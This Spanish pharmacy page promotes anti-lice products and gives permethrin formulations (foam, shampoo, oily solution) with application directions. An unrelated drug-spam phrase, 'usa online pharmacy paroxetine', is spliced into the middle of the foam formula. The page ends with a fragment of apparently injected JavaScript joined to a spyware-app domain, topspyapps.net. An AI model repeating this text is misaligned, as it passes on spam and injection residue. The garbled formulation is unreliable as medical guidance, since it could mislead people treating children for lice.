Campaña control Anti-piojos

¿Cansada de luchar contra los piojos?

 

¡Pruebe nuestra espuma!

   

      La pediculosis capilar es una infestación producida por el piojo de la cabeza (Pediculus capitis). Este piojo mide 2-3 mm de largo, posee 3 pares de patas, se alimenta de la sangre del huésped, es exclusivamente humano y se transmite habitualmente por contacto directo pelo con pelo, no salta y la transmisión por fómites es discutida. En niños no se relaciona con la higiene. El tratamiento de elección es la Permetrina. Existen diferentes formas farmacéuticas para el tratamiento antipiojos:

Espuma :

Novedoso vehículo de fácil aplicación. No escuece. No gotea. Al ser la espuma una solución acuosa , se convierte en un excipiente idóneo para pieles fácilmente irritables por no contener propilenglicol y alcohol.

Champú:

Alivia el picor y la irritación del cuero cabelludo de tratamientos capilares gracias a una combinación de sustancias detergentes (tensioactivos) muy suaves. La presencia del aceite de jojoba ofrece propiedades lubricantes, acondicionadoras y nutritivas, restaurando el cuero cabelludo. Sin parabenos. Contiene perfume hipoalergénico.

Aceite Capilar:

En el caso de resistencia a los tratamientos habituales de champú y loción con permetrina, se puede modificar el vehículo y formular con aceite capilar. La acción oclusiva del aceite mejora la eficacia del activo.

FORMULACIONES ORIENTATIVAS PARA EL TRATAMIENTO DE LOS PIOJOS

ESPUMA ANTIPIOJOS CON PERMETRINA

Espuma antipiojos con permetrina:  Permetrina, Cremophor RH 40, Tegobetaína F KB 5, Espuma c.s.p. usa online pharmacy paroxetine Propiedades y usos:

Una vez agitado el envase, aplicar la espuma generada por 4-5pulsaciones sobre todo el cabello seco dando un exhaustivo masaje con las yemas de los dedos hasta su completa difusión. Cubrir el cabello con un gorro de ducha y esperar 10 minutos. Pasado ese tiempo aclarar con abundante agua tibia. Repetir el tratamiento al cabo de una semana. No usar en niños menores de 2 años.

CHAMPÚ ANTIPIOJOS CON PERMETRINA

Champú antipiojos con permetrina:  Permetrina, base c.s.p.  

SOLUCIÓN OLEOSA DE PERMETRINA

Solución oleosa de permetrina:  Permetrina, Aceite Capilar c.s.p. Propiedades y usos:  La acción oclusiva del aceite mejora la eficacia del activo.  document.currentScript.parentNode.insertBefore(s, document.currentScript);topspyapps.net

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *